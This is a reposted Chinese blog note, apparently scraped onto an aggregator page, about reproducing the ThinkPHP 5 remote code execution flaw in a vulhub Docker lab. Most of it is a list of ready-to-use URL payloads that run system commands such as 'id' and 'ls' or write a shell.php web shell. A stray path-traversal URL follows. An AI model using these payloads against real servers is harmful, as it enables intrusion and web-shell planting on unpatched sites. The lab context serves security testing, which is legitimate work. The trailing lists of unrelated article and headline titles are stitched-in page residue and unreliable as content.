https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce

docker-compose -f /home/root/compose.yml up

然后访问127.0.0.1:8080

POC:

1、?s=index/\think\Request/input&filter=phpinfo&data=1

2、?s=index/\think\Request/input&filter=system&data=id

3、?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

4、?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

5、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

6、?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

7、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

8、?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

看那个好用用哪个,我是直接用第六个:

http://127.0.0.1:8080/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

admin.php?c=../../../../../home/wwwroot/server/phpinfo&a=detailMake

转载于:https://www.cnblogs.com/nul1/p/10104368.html

thinkphp 5.0 代码执行漏洞相关推荐

  1. ecshop 解密index.php,ECShop 2.x 3.0代码执行漏洞分析

    0x00 前言 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店.2.x版本跟3.0版本存在代码执行漏洞. 0x01 漏洞原理 ECShop 没有对 $GLOBAL['_SE ...

  2. thinkphp v5.0.11漏洞_thinkphp 5.0 代码执行漏洞

    docker-compose -f /home/root/compose.yml up 然后访问127.0.0.1:8080 POC: 1.?s=index/\think\Request/input& ...

  3. php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞

    作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...

  4. thinkphp v5.0.11漏洞_ThinkPHP5丨远程代码执行漏洞动态分析

    ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,在保持出色的性能和至简代码的同时,也注重易用性.但是简洁易操作也会出现漏洞,之前ThinkPHP官方修复了一个严重的远程代码执行漏 ...

  5. Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)

    thinkphp-RCE-POC 官方公告: 1.https://blog.thinkphp.cn/869075 2.https://blog.thinkphp.cn/910675 POC: 批量检测 ...

  6. ThinkPHP 5.0.23 远程代码执行 漏洞复现

    ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...

  7. thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

     漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...

  8. wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943

    近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞.代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码.据漏洞披露者文中所介 ...

  9. thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法

    ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...

最新文章

  1. cesium多边形描边_Cesium专栏-地形开挖2-任意多边形开挖(附源码下载)
  2. CDH 的Cloudera Manager免费与收费版的对比表
  3. css毛玻璃效果白边_css3毛玻璃效果白边问题
  4. Ice-3.5.1在CentOS 6.5系统中的编译配置教程
  5. php 单例模式 单态模式
  6. 64位ubuntu 12.04下如何解决中文乱码的问题
  7. 「分布式系统理论」系列专题
  8. iOS绘图框架CoreGraphics分析
  9. 递归法:求两个串的最大公共子序列的长度
  10. 为什么我的眼里常含泪水,因为Mysql让我变的深沉(2021最新版mysql安装)
  11. Spring Cloud学习笔记---Spring Cloud Sleuth--一个手动搭建zipkin碰到的坑
  12. WinForm 窗体美化
  13. linux redis命令客户端,Redis客户端与基本命令
  14. python爬虫记录
  15. 云计算进入深水区 青云QingCloud做行业云是认真的
  16. 组织人事领域信息化探索:开启编制、干部、人事一体化管理新模式
  17. wxpython收费吗_使用wxPython开发一个简单GUI应用
  18. DNS服务器地址小总结
  19. ubuntu下载神器---xdm
  20. 机器学习和人工智能发展简史

热门文章

  1. 信号扫描_微观世界扫描电子显微镜(SEM)
  2. centos 6.4/6.5下源码编译安装mysql_CentOS 6.4/6.5下源码编译安装mysql
  3. 全球首款光线追踪GPU
  4. opencv android
  5. ubuntu中mysql怎么退出命令_ubuntu的Linux下安装MySQL
  6. 前端代码获取文件大小_vue技术栈前端建设方案
  7. html5 制作商品显示介绍,HTML5+CSS3:3D展示商品信息示例
  8. php 自动寻路算法,PHP树-不需要递归的实现方法
  9. 故障码123401_P0221故障码故障原因和解决方法
  10. vue 导入excel解析_VUE中导入excel文件